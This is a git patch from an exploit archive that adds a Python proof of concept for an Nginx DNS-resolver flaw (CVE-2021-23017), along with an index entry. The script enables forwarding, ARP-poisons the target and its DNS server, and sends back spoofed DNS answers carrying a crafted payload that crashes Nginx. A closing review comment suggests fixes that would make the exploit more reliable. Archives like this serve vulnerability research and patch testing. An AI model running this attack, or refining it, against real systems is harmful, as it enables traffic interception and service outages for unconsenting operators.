From d84f857e94f91c71fcb93041483f661d29023c1e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 12 Jul 2022 05:01:53 +0000
Subject: [PATCH] DB: 2022-07-12
1 changes to exploits/shellcodes
Nginx 1.20.0 - Denial of Service (DOS)
---
 exploits/multiple/remote/50973.py | 114 ++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 115 insertions(+)
 create mode 100755 exploits/multiple/remote/50973.py
diff --git a/exploits/multiple/remote/50973.py b/exploits/multiple/remote/50973.py
new file mode 100755
index 000000000..bbdfd01ed
--- /dev/null
+++ b/exploits/multiple/remote/50973.py
@@ -0,0 +1,114 @@
+# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)
+# Date: 2022-6-29
+# Exploit Author: Mohammed Alshehri - https://Github.com/M507
+# Vendor Homepage: https://nginx.org/
+# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0
+# Version: 0.6.18 - 1.20.0
+# Tested on: Ubuntu 18.04.4 LTS bionic
+# CVE: CVE-2021-23017
+# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
+# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1
+# The service needs to be configured to use Nginx resolver
+
+from scapy.all import *
+from multiprocessing import Process
+from binascii import hexlify, unhexlify
+import argparse, time, os
+
+def device_setup():
+ os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
+ os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")
+
+def ARPP(target, dns_server):
+ print("[*] Sending poisoned ARP packets")
+ target_mac = getmacbyip(target)
+ dns_server_mac = getmacbyip(dns_server)
+ while True:
+ time.sleep(2)
+ send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
+ send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)
+
+def exploit(target):
+ print("[*] Listening ")
+ sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)
+
+"""
+RFC schema
+ 0 1 2 3
+ 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+| LENGTH | ID |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+| ANCOUNT | NSCOUNT |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+| ARCOUNT | QD |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+| AN | NS |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+| AR |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+Fig. 
DNS
+
+"""
+def process_received_packet(received_packet):
+ if received_packet[IP].src == target_ip:
+ if received_packet.haslayer(DNS):
+ if DNSQR in received_packet:
+ print("[*] the received packet: " + str(bytes_hex(received_packet)))
+ print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
+ try:
+ # \/ the received DNS request
+ dns_request = received_packet[DNS].build()
+ null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
+ print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
+ print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
+ payload = [
+ dns_request[0:2],
+ b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
+ dns_request[12:null_pointer_index+1],
+ dns_request[null_pointer_index+1:null_pointer_index+3],
+ dns_request[null_pointer_index+3:null_pointer_index+5],
+ b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
+ b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
+ b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
+ b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
+ ]
+
+ payload = b"".join(payload)
+ spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
+ UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
+ payload)
+ print("[+] dns answer: "+str(hexlify(payload)))
+ print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))
+
+ sendp(spoofed_pkt, count=1)
+ print("\n[+] malicious answer was sent")
+ print("[+] exploited\n")
+ except:
+ print("\n[-] ERROR")
+
+def main():
+ global target_ip
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-t", "--target", help="IP address of the target")
+ parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
+ args = parser.parse_args()
+ target_ip = args.target
+ dns_server_ip = args.dns_server
+ device_setup()
+ processes_list = []
+ ARPPProcess = 
Process(target=ARPP,args=(target_ip,dns_server_ip))
+ exploitProcess = Process(target=exploit,args=(target_ip,))
+ processes_list.append(ARPPProcess)
+ processes_list.append(exploitProcess)
+ for process in processes_list:
+ process.start()
+ for process in processes_list:
+ process.join()
+
+if __name__ == '__main__':
+ target_ip = ""
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 86de269c2..d3325a88f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18711,6 +18711,7 @@ id,file,description,date,author,type,platform,port
 50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Tomas Melicher",remote,hardware,
 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple,
 50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",1970-01-01,RedHatAugust,remote,windows,
+50973,exploits/multiple/remote/50973.py,"Nginx 1.20.0 - Denial of Service (DOS)",1970-01-01,"Mohammed Alshehri",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
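Review bot: The bare `except:` that closes the `try` in `process_received_packet` catches everything, including `KeyboardInterrupt` and `SystemExit`, and prints only `[-] ERROR`, so any failure in that block leaves nothing to diagnose; narrow it to `except Exception as exc:` and report the cause with `print(f"\n[-] ERROR: {exc!r}")`. `device_setup` changes state on the host running the script through `os.system` (`ip_forward` and an iptables FORWARD rule) and nothing in `main` reverts it when the processes are interrupted, which the header block should say, e.g. `# NOTE: device_setup() leaves ip_forward=1 and the iptables FORWARD rule in place; remove them manually after the run`. `target_ip` is assigned as a module global in `main` but read inside `process_received_packet`, which runs in the child `Process` started for `exploit`; this appears to rely on the fork start method, and on a platform whose default is spawn the child would presumably see the `""` set under `__main__`, so passing the value explicitly, as `exploit(target)` already receives it, would be more robust. `ARPP` loops forever and `main` joins both processes, so the script only ends on Ctrl-C, which deserves a one-line comment above the `while True:`.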